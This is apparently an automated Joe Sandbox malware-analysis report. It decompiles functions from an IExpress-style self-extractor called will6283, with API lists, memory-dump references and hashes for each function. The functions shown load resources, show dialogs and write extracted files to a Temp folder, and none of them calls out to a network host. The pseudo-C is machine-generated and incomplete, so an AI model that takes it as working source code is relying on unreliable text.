                                                • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,01063938,?,?,?,?,-00000005), ref: 01062958
                                                • GlobalLock.KERNEL32 ref: 01062969
                                                • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,01063938,?,?,?,?,-00000005,?), ref: 01062A21
                                                • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 01062A81
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                • String ID:
                                                • API String ID: 3949799724-0
                                                • Opcode ID: d75e270ed2e3d7dd24de47e0adee301810f937145228bc79f33743031e6f796f
                                                • Instruction ID: f4b27bd3859079ec9d2250f6945125c30cade756ae25cbec015a384936ca7e2e
                                                • Opcode Fuzzy Hash: d75e270ed2e3d7dd24de47e0adee301810f937145228bc79f33743031e6f796f
                                                • Instruction Fuzzy Hash: AB512B71E0021ADFDB21DF98C884AAEFBF9FF48700F14416AE985E3211D7759A41CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 32%
                                                			E01064169(void* __eflags) {
                                                				int _t18;
                                                				void* _t21;
                                                
                                                				_t20 = E0106468F("FINISHMSG", 0, 0);
                                                				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                				if(_t21 != 0) {
                                                					if(E0106468F("FINISHMSG", _t21, _t20) != 0) {
                                                						if(lstrcmpA(_t21, "<None>") == 0) {
                                                							L7:
                                                							return LocalFree(_t21);
                                                						}
                                                						_push(0);
                                                						_push(0x40);
                                                						_push(0);
                                                						_push(_t21);
                                                						_t18 = 0x3e9;
                                                						L6:
                                                						E010644B9(0, _t18);
                                                						goto L7;
                                                					}
                                                					_push(0);
                                                					_push(0x10);
                                                					_push(0);
                                                					_push(0);
                                                					_t18 = 0x4b1;
                                                					goto L6;
                                                				}
                                                				return E010644B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                			}





                                                0x0106417d
                                                0x0106418f
                                                0x01064193
                                                0x010641b7
                                                0x010641d3
                                                0x010641e6
                                                0x00000000
                                                0x010641e7
                                                0x010641d5
                                                0x010641d6
                                                0x010641d8
                                                0x010641d9
                                                0x010641da
                                                0x010641df
                                                0x010641e1
                                                0x00000000
                                                0x010641e1
                                                0x010641b9
                                                0x010641ba
                                                0x010641bc
                                                0x010641bd
                                                0x010641be
                                                0x00000000
                                                0x010641be
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 0106468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010646A0
                                                  • Part of subcall function 0106468F: SizeofResource.KERNEL32(00000000,00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646A9
                                                  • Part of subcall function 0106468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010646C3
                                                  • Part of subcall function 0106468F: LoadResource.KERNEL32(00000000,00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646CC
                                                  • Part of subcall function 0106468F: LockResource.KERNEL32(00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646D3
                                                  • Part of subcall function 0106468F: memcpy_s.MSVCRT ref: 010646E5
                                                  • Part of subcall function 0106468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010646EF
                                                • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,010630B4), ref: 01064189
                                                • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,010630B4), ref: 010641E7
                                                  • Part of subcall function 010644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01064518
                                                  • Part of subcall function 010644B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 01064554
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                • String ID: <None>$FINISHMSG
                                                • API String ID: 3507850446-3091758298
                                                • Opcode ID: ac2c98cce3cb795d92de3026894e22f7944d6ba860e976e74d3e7893993c5270
                                                • Instruction ID: b57c389df85d94bcf65d2882288fcb7254cd61d27ba43abd9e0fdce7b21b577d
                                                • Opcode Fuzzy Hash: ac2c98cce3cb795d92de3026894e22f7944d6ba860e976e74d3e7893993c5270
                                                • Instruction Fuzzy Hash: 870181F5740225FFF32526698C85FBB658EDBE8695F004025B786EA184DE69CC0141B5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E01067155() {
                                                				void* _v8;
                                                				struct _FILETIME _v16;
                                                				signed int _v20;
                                                				union _LARGE_INTEGER _v24;
                                                				signed int _t23;
                                                				signed int _t36;
                                                				signed int _t37;
                                                				signed int _t39;
                                                
                                                				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                				_t23 =  *0x1068004; // 0x19e58fb5
                                                				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                					GetSystemTimeAsFileTime( &_v16);
                                                					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                					_v8 = _v8 ^ GetCurrentProcessId();
                                                					_v8 = _v8 ^ GetCurrentThreadId();
                                                					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                					QueryPerformanceCounter( &_v24);
                                                					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                					_t39 = _t36;
                                                					if(_t36 == 0xbb40e64e || ( *0x1068004 & 0xffff0000) == 0) {
                                                						_t36 = 0xbb40e64f;
                                                						_t39 = 0xbb40e64f;
                                                					}
                                                					 *0x1068004 = _t39;
                                                				}
                                                				_t37 =  !_t36;
                                                				 *0x1068008 = _t37;
                                                				return _t37;
                                                			}











                                                0x0106715d
                                                0x01067161
                                                0x01067165
                                                0x01067178
                                                0x01067182
                                                0x0106718e
                                                0x01067197
                                                0x010671a0
                                                0x010671b1
                                                0x010671b8
                                                0x010671c4
                                                0x010671c7
                                                0x010671cb
                                                0x010671d5
                                                0x010671da
                                                0x010671da
                                                0x010671dc
                                                0x010671dc
                                                0x010671e2
                                                0x010671e5
                                                0x010671ee

                                                APIs
                                                • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 01067182
                                                • GetCurrentProcessId.KERNEL32 ref: 01067191
                                                • GetCurrentThreadId.KERNEL32 ref: 0106719A
                                                • GetTickCount.KERNEL32 ref: 010671A3
                                                • QueryPerformanceCounter.KERNEL32(?), ref: 010671B8
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                • String ID:
                                                • API String ID: 1445889803-0
                                                • Opcode ID: c2ce4e958a48344bcecfc89351136f610794b2ce117c3521d3c2c7ee8b249044
                                                • Instruction ID: 3fced7b2923822a4fc4ff41582af4b55e34316b012b9301adcad4abd9a346c92
                                                • Opcode Fuzzy Hash: c2ce4e958a48344bcecfc89351136f610794b2ce117c3521d3c2c7ee8b249044
                                                • Instruction Fuzzy Hash: E8115171E01208EFDF60DFB8D64869EB7F5FF08314F514896E841EB214D7359A008B40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 93%
                                                			E010619E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                				signed int _v8;
                                                				char _v520;
                                                				void* __esi;
                                                				signed int _t11;
                                                				void* _t14;
                                                				void* _t23;
                                                				void* _t27;
                                                				void* _t33;
                                                				struct HWND__* _t34;
                                                				signed int _t35;
                                                
                                                				_t33 = __edi;
                                                				_t27 = __ebx;
                                                				_t11 =  *0x1068004; // 0x19e58fb5
                                                				_v8 = _t11 ^ _t35;
                                                				_t34 = _a4;
                                                				_t14 = _a8 - 0x110;
                                                				if(_t14 == 0) {
                                                					_t32 = GetDesktopWindow();
                                                					E010643D0(_t34, _t15);
                                                					_v520 = 0;
                                                					LoadStringA( *0x1069a3c, _a16,  &_v520, 0x200);
                                                					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                					MessageBeep(0xffffffff);
                                                					goto L6;
                                                				} else {
                                                					if(_t14 != 1) {
                                                						L4:
                                                						_t23 = 0;
                                                					} else {
                                                						_t32 = _a12;
                                                						if(_t32 - 0x83d > 1) {
                                                							goto L4;
                                                						} else {
                                                							EndDialog(_t34, _t32);
                                                							L6:
                                                							_t23 = 1;
                                                						}
                                                					}
                                                				}
                                                				return E01066CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                			}













                                                0x010619e0
                                                0x010619e0
                                                0x010619eb
                                                0x010619f2
                                                0x010619f9
                                                0x010619fc
                                                0x01061a01
                                                0x01061a2a
                                                0x01061a2e
                                                0x01061a3e
                                                0x01061a4f
                                                0x01061a62
                                                0x01061a6a
                                                0x00000000
                                                0x01061a03
                                                0x01061a06
                                                0x01061a20
                                                0x01061a20
                                                0x01061a08
                                                0x01061a08
                                                0x01061a14
                                                0x00000000
                                                0x01061a16
                                                0x01061a18
                                                0x01061a70
                                                0x01061a72
                                                0x01061a72
                                                0x01061a14
                                                0x01061a06
                                                0x01061a81

                                                APIs
                                                • EndDialog.USER32(?,?), ref: 01061A18
                                                • GetDesktopWindow.USER32 ref: 01061A24
                                                • LoadStringA.USER32(?,?,00000200), ref: 01061A4F
                                                • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 01061A62
                                                • MessageBeep.USER32(000000FF), ref: 01061A6A
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                • String ID:
                                                • API String ID: 1273765764-0
                                                • Opcode ID: ffcf53d03600d93c56c44416b14272d29e106a011e3600a62603a12360671e2d
                                                • Instruction ID: f57463b00b53059c0fff4467642f764b2cf373c963f64652f9e195d63f6e5abf
                                                • Opcode Fuzzy Hash: ffcf53d03600d93c56c44416b14272d29e106a011e3600a62603a12360671e2d
                                                • Instruction Fuzzy Hash: E1116131600119EFDB60EF68D908AAE77F8FF49350F008195E996E7194DA36AE01CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 88%
                                                			E010663C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                				signed int _v8;
                                                				char _v268;
                                                				long _v272;
                                                				void* _v276;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t15;
                                                				long _t28;
                                                				struct _OVERLAPPED* _t37;
                                                				void* _t39;
                                                				signed int _t40;
                                                
                                                				_t15 =  *0x1068004; // 0x19e58fb5
                                                				_v8 = _t15 ^ _t40;
                                                				_v272 = _v272 & 0x00000000;
                                                				_push(__ecx);
                                                				_v276 = _a16;
                                                				_t37 = 1;
                                                				E01061781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
                                                				E0106658A( &_v268, 0x104, _a12);
                                                				_t28 = 0;
                                                				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                				if(_t39 != 0xffffffff) {
                                                					_t28 = _a4;
                                                					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                						 *0x1069124 = 0x80070052;
                                                						_t37 = 0;
                                                					}
                                                					CloseHandle(_t39);
                                                				} else {
                                                					 *0x1069124 = 0x80070052;
                                                					_t37 = 0;
                                                				}
                                                				return E01066CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                			}















                                                0x010663cb
                                                0x010663d2
                                                0x010663d8
                                                0x010663ea
                                                0x010663f3
                                                0x01066401
                                                0x01066402
                                                0x01066410
                                                0x01066415
                                                0x01066433
                                                0x01066438
                                                0x01066449
                                                0x01066463
                                                0x0106646d
                                                0x01066477
                                                0x01066477
                                                0x0106647a
                                                0x0106643a
                                                0x0106643a
                                                0x01066444
                                                0x01066444
                                                0x01066492

                                                APIs
                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0106642D
                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0106645B
                                                • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0106647A
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 010663EB
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: File$CloseCreateHandleWrite
                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                • API String ID: 1065093856-2356899610
                                                • Opcode ID: 909283ec753156e7ea196f9ce0d3682de2eb748510a32ba5b0f955beaa895749
                                                • Instruction ID: b4d5a4cc4a752be6b6c4ba91beb4a7cd91063214a0a780e407d50192d8c22353
                                                • Opcode Fuzzy Hash: 909283ec753156e7ea196f9ce0d3682de2eb748510a32ba5b0f955beaa895749
                                                • Instruction Fuzzy Hash: 6421C071A00218AFDB20DF25DC85FEA77BCEB55314F1041A9E5C5A7280DAB66E848FA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E010647E0(intOrPtr* __ecx) {
                                                				intOrPtr _t6;
                                                				intOrPtr _t9;
                                                				void* _t11;
                                                				void* _t19;
                                                				intOrPtr* _t22;
                                                				void _t24;
                                                				struct HWND__* _t25;
                                                				struct HWND__* _t26;
                                                				void* _t27;
                                                				intOrPtr* _t28;
                                                				intOrPtr* _t33;
                                                				void* _t34;
                                                
                                                				_t33 = __ecx;
                                                				_t34 = LocalAlloc(0x40, 8);
                                                				if(_t34 != 0) {
                                                					_t22 = _t33;
                                                					_t27 = _t22 + 1;
                                                					do {
                                                						_t6 =  *_t22;
                                                						_t22 = _t22 + 1;
                                                					} while (_t6 != 0);
                                                					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                					 *_t34 = _t24;
                                                					if(_t24 != 0) {
                                                						_t28 = _t33;
                                                						_t19 = _t28 + 1;
                                                						do {
                                                							_t9 =  *_t28;
                                                							_t28 = _t28 + 1;
                                                						} while (_t9 != 0);
                                                						E01061680(_t24, _t28 - _t19 + 1, _t33);
                                                						_t11 =  *0x10691e0; // 0xf37c00
                                                						 *(_t34 + 4) = _t11;
                                                						 *0x10691e0 = _t34;
                                                						return 1;
                                                					}
                                                					_t25 =  *0x1068584; // 0x0
                                                					E010644B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                					LocalFree(_t34);
                                                					L2:
                                                					return 0;
                                                				}
                                                				_t26 =  *0x1068584; // 0x0
                                                				E010644B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                				goto L2;
                                                			}















                                                0x010647e8
                                                0x010647f0
                                                0x010647f4
                                                0x0106480f
                                                0x01064811
                                                0x01064814
                                                0x01064814
                                                0x01064816
                                                0x01064817
                                                0x01064829
                                                0x0106482b
                                                0x0106482f
                                                0x0106484f
                                                0x01064852
                                                0x01064855
                                                0x01064855
                                                0x01064857
                                                0x01064858
                                                0x01064860
                                                0x01064865
                                                0x0106486a
                                                0x0106486f
                                                0x00000000
                                                0x01064876
                                                0x01064831
                                                0x01064841
                                                0x01064847
                                                0x0106480b
                                                0x00000000
                                                0x0106480b
                                                0x010647f6
                                                0x01064806
                                                0x00000000

                                                APIs
                                                • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,01064E6F), ref: 010647EA
                                                • LocalAlloc.KERNEL32(00000040,?), ref: 01064823
                                                • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 01064847
                                                  • Part of subcall function 010644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01064518
                                                  • Part of subcall function 010644B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 01064554
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 01064851
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: Local$Alloc$FreeLoadMessageString
                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                • API String ID: 359063898-2356899610
                                                • Opcode ID: 77e4aa08d796841f3b6b686c5fd0e2ca0828bdc895d1a5daf2b188161e069367
                                                • Instruction ID: b78da12180b7fb1cdaf7b72ade0b1fd1013bf0919f25f6e1d19298777b28405f
                                                • Opcode Fuzzy Hash: 77e4aa08d796841f3b6b686c5fd0e2ca0828bdc895d1a5daf2b188161e069367
                                                • Instruction Fuzzy Hash: CF1159B4600701EFD7759E249808F7A3B9EEBC5300B048459EEC2DB345CA3AC806C720
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 77%
                                                			E01066517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                				struct HRSRC__* _t6;
                                                				void* _t21;
                                                				struct HINSTANCE__* _t23;
                                                				int _t24;
                                                
                                                				_t23 =  *0x1069a3c; // 0x1060000
                                                				_t6 = FindResourceA(_t23, __edx, 5);
                                                				if(_t6 == 0) {
                                                					L6:
                                                					E010644B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                					_t24 = _a16;
                                                				} else {
                                                					_t21 = LoadResource(_t23, _t6);
                                                					if(_t21 == 0) {
                                                						goto L6;
                                                					} else {
                                                						if(_a12 != 0) {
                                                							_push(_a12);
                                                						} else {
                                                							_push(0);
                                                						}
                                                						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                						FreeResource(_t21);
                                                						if(_t24 == 0xffffffff) {
                                                							goto L6;
                                                						}
                                                					}
                                                				}
                                                				return _t24;
                                                			}







                                                0x0106651f
                                                0x0106652a
                                                0x01066534
                                                0x0106656b
                                                0x01066577
                                                0x0106657c
                                                0x01066536
                                                0x0106653e
                                                0x01066542
                                                0x00000000
                                                0x01066544
                                                0x01066547
                                                0x0106654c
                                                0x01066549
                                                0x01066549
                                                0x01066549
                                                0x0106655e
                                                0x01066560
                                                0x01066569
                                                0x00000000
                                                0x00000000
                                                0x01066569
                                                0x01066542
                                                0x01066587

                                                APIs
                                                • FindResourceA.KERNEL32(01060000,000007D6,00000005), ref: 0106652A
                                                • LoadResource.KERNEL32(01060000,00000000,?,?,01062EE8,00000000,010619E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 01066538
                                                • DialogBoxIndirectParamA.USER32(01060000,00000000,00000547,010619E0,00000000), ref: 01066557
                                                • FreeResource.KERNEL32(00000000,?,?,01062EE8,00000000,010619E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 01066560
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                • String ID:
                                                • API String ID: 1214682469-0
                                                • Opcode ID: 2997f4554da6f0a4323611b836627d7283fd2c19fdc202431d3fe0576ce9b6df
                                                • Instruction ID: f4646413425b37d3f87f77674cad0ae5bd5cc0ae677bfe4f33e88c13049a946f
                                                • Opcode Fuzzy Hash: 2997f4554da6f0a4323611b836627d7283fd2c19fdc202431d3fe0576ce9b6df
                                                • Instruction Fuzzy Hash: 5D01D672200615FBDB216E699C49DBB7AACEB85761F000165FE90E3154DB77CD5087A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E01063680(void* __ecx) {
                                                				void* _v8;
                                                				struct tagMSG _v36;
                                                				int _t8;
                                                				struct HWND__* _t16;
                                                
                                                				_v8 = __ecx;
                                                				_t16 = 0;
                                                				while(1) {
                                                					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                					if(_t8 == 0) {
                                                						break;
                                                					}
                                                					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                						continue;
                                                					} else {
                                                						do {
                                                							if(_v36.message != 0x12) {
                                                								DispatchMessageA( &_v36);
                                                							} else {
                                                								_t16 = 1;
                                                							}
                                                							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                						} while (_t8 != 0);
                                                						if(_t16 == 0) {
                                                							continue;
                                                						}
                                                					}
                                                					break;
                                                				}
                                                				return _t8;
                                                			}







                                                0x0106368c
                                                0x0106368f
                                                0x01063691
                                                0x0106369f
                                                0x010636a7
                                                0x00000000
                                                0x00000000
                                                0x010636ba
                                                0x00000000
                                                0x010636bc
                                                0x010636bc
                                                0x010636c0
                                                0x010636cb
                                                0x010636c2
                                                0x010636c4
                                                0x010636c4
                                                0x010636da
                                                0x010636e0
                                                0x010636e6
                                                0x00000000
                                                0x00000000
                                                0x010636e6
                                                0x00000000
                                                0x010636ba
                                                0x010636ed

                                                APIs
                                                • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0106369F
                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010636B2
                                                • DispatchMessageA.USER32(?), ref: 010636CB
                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010636DA
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                • String ID:
                                                • API String ID: 2776232527-0
                                                • Opcode ID: 4e0c0ac79626bbaae42165775a2aca39824b949f9d3f6906e76395f5b152f14d
                                                • Instruction ID: 336c0a9dedbf4e4d09bfe48ce8e6d50d1add0edd21b496b45c1be514417dc89d
                                                • Opcode Fuzzy Hash: 4e0c0ac79626bbaae42165775a2aca39824b949f9d3f6906e76395f5b152f14d
                                                • Instruction Fuzzy Hash: 2C018472A00215BBDB305AAA5C48EEB7ABCFB89B10F004159FA49EA184D5658940C7A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 72%
                                                			E010665E8(char* __ecx) {
                                                				char _t3;
                                                				char _t10;
                                                				char* _t12;
                                                				char* _t14;
                                                				char* _t15;
                                                				CHAR* _t16;
                                                
                                                				_t12 = __ecx;
                                                				_t15 = __ecx;
                                                				_t14 =  &(__ecx[1]);
                                                				_t10 = 0;
                                                				do {
                                                					_t3 =  *_t12;
                                                					_t12 =  &(_t12[1]);
                                                				} while (_t3 != 0);
                                                				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                				while(1) {
                                                					_t16 = CharPrevA(_t15, ??);
                                                					if(_t16 <= _t15) {
                                                						break;
                                                					}
                                                					if( *_t16 == 0x5c) {
                                                						L7:
                                                						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                							_t16 = CharNextA(_t16);
                                                						}
                                                						 *_t16 = _t10;
                                                						_t10 = 1;
                                                					} else {
                                                						_push(_t16);
                                                						continue;
                                                					}
                                                					L11:
                                                					return _t10;
                                                				}
                                                				if( *_t16 == 0x5c) {
                                                					goto L7;
                                                				}
                                                				goto L11;
                                                			}









                                                0x010665e8
                                                0x010665ed
                                                0x010665ef
                                                0x010665f2
                                                0x010665f4
                                                0x010665f4
                                                0x010665f6
                                                0x010665f7
                                                0x01066608
                                                0x01066611
                                                0x01066618
                                                0x0106661c
                                                0x00000000
                                                0x00000000
                                                0x0106660e
                                                0x01066623
                                                0x01066625
                                                0x0106663b
                                                0x0106663b
                                                0x0106663d
                                                0x01066641
                                                0x01066610
                                                0x01066610
                                                0x00000000
                                                0x01066610
                                                0x01066644
                                                0x01066647
                                                0x01066647
                                                0x01066621
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                APIs
                                                • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,01062B33), ref: 01066602
                                                • CharPrevA.USER32(?,00000000), ref: 01066612
                                                • CharPrevA.USER32(?,00000000), ref: 01066629
                                                • CharNextA.USER32(00000000), ref: 01066635
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
